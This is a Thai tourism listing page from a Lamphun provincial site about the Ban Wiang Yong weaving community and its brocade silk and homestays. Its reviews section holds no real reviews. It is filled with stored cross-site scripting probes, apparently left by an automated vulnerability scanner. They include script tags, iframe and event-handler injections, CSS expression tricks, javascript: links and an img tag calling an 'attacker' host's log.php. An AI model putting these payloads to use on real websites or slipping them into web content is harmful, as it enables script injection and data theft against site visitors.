โหลด App ฟรี

สัมผัสวิถีชุมชนบ้านเวียงยอง แหล่งทอผ้าไหมยกดอกลำพูน

เมือง   273 รีวิว  253 รูป
ที่ตั้ง ตำบลเวียงยอง ต. อ.เมือง จ.ลำพูน  
เบอร์โทรศัพท์
Website http://
Email
รายละเอียด
คนลำพูนนั้นทอผา้ใชเ้องมาแต่นมนานผ้าไหมยกดอกหรือผ้าไหมทอด้วยฝีมือประณีตจากลำพูน เป็นที่ต้องการทั่วไปไม่เฉพาะแต่ในราชสำนักเท่านั้น คนลำพูนที่มองการณ์ไกลเริ่มสร้างโรงงานทอผ้ายกดอกออกจำหน่าย จนเป็นหัตถ
อุตสาหกรรมที่ขึ้นชื่อ มีการทอผ้าไหมยกดอก และผ้าฝ้ายยกดอกด้วยกี่พื้นเมืองแทบทุกบ้าน ล้วนถ่ายทอดมาแต่รุ่นบรรพบุรุษ ทั้งลวดลายและวิธีการทอแม้เวลาจะผ่านไปกว่าร้อยปี แหล่งผลิตศิลปะวิจิตรบนผืนผ้าของคนลำพูน ยังอยู่ที่เดิมจิตวิญญาณของพวกเขายังผูกพันกับกี่ ฟืม ตะกอ
และลวดลายบนผลงานที่เปลี่ยนแปลงไปน้อยมากจากรุ่นบรรพบุรุษจะเดินข้ามสะพานท่าสิงห์ หรือขัวมุง หน้าวัดพระธาตุฯ หรือจะขับรถอ้อมไปในเส้นทางเลียบสวนลำไยแถวนั้น ตำบลเวียงยองแหล่งผลิตผ้าทอยกดอกที่ขึ้นชื่อของลำพูนก็ง่ายต่อการเข้าถึงคนยอง ที่ปัจจุบันเป็นคนส่วนใหญ่ของเมืองนี้ คนยองมีสำเนียงพูดล่องไหลเหมือนดนตรี มี
ฝีมือทางศิลปะ สาวชาวยองผิวผ่องเหมือนหยวกกล้วย วันสรงน้ำพระธาตุจะเห็นพวกเธออุ้มขันน้ำมาร่วมพิธีแต่งแต้มให้พิธีงามเหมือนฝันกลุ่มชนเหล่านี้ต่อมาคือช่างทอผ้า สล่าช่างฝีมือและผู้คนที่เจรจาภาษาดนตรีอยู่ริมแม่น้ำกวง
หากต้องการเรียนรู้วิถีชีวิตชาวยอง เป็นประจักษ์พยานถึงความชำนาญในการทอผ้าของพวกเขา หรือสัมผัสความสงบงามของบ้านเมืองและผู้คนให้ลึกซึ้งกว่านี้ มีบริการพักค้างคืนร่วมกับชาวบ้าน ที่เปี่ยมด้วยน้ำมิตร เป็นวิถีชีวิตดั้งเดิมแต่ไม่ขาดแคลนความสะดวกสบายคนที่ไปพักมาแล้วยืนยันว่าได้ประสบการณ์ล้ำค่า ได้ความรู้ และความรัก

กิจกกรมที่ต้องทำที่นี่

ข้อมูลเพิ่มเติม และรีวิวสถานที่นี้ จากรอบข้าง

  ข้อมูล สัมผัสวิถีชุมชนบ้านเวียงยอง แหล่งทอผ้าไหมยกดอกลำพูน จาก Google
  ข้อมูล สัมผัสวิถีชุมชนบ้านเวียงยอง แหล่งทอผ้าไหมยกดอกลำพูน จากเว็บไปด้วยกัน
   
 
   
Reviews (273)
เขียนรีวิวสถานที่
ข้อความ :
รูปภาพ :
เขียนโดย :

1 - 9/19/2019
1
1 - 9/19/2019
1
1 - 9/19/2019
1
1 - 9/19/2019
1<img sRc='http://attacker-922161/log.php?
1 - 9/19/2019
1<ifRAme sRc=992163.com></IfRamE>
1 - 9/19/2019
1_29PnF <ScRiPt >prompt(945785)</ScRiPt>
1 - 9/19/2019
1}body{acu:Expre/**/SSion(prompt(910525))}
1 - 9/19/2019
1<img<!-- --> src=x onerror=alert(964312);//><!-- -->
1 - 9/19/2019
[url=http://www.vulnweb.com][/url]
1 - 9/19/2019
<a HrEF=jaVaScRiPT:>
1 - 9/19/2019
<a HrEF=http://www.vulnweb.com></a>
1 - 9/19/2019
1<input autofocus onfocus=prompt(956192)>
1 - 9/19/2019
๖<img acu onmouseover=prompt(943305) //๖>
1 - 9/19/2019
1<ScRiPt>prompt(938335)</sCripT>
1 - 9/19/2019
1\u003CScRiPt\u003Eprompt(936750)\u003C/sCripT\u003E
1 - 9/19/2019
1<ScRiPt%20>prompt(912771)</sCripT>
1 - 9/19/2019
1<img/src=">" onerror=alert(996833)>
1 - 9/19/2019
1<img src=xyz OnErRor=prompt(905302)>
1 - 9/19/2019
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986277)>
1 - 9/19/2019
1<body onload=prompt(930580)>

 
 
 
Copyright © 2016-2018 สนง.ปลัด อบจ.ลำพูน. All rights reserved. เจ้าของโรงแรม รีสอร์ท | เจ้าของร้านอาหาร
125 หมู่ 15 ต.ป่าสัก อ.เมือง จ.ลำพูน 51000 โทร: 0-5359-7260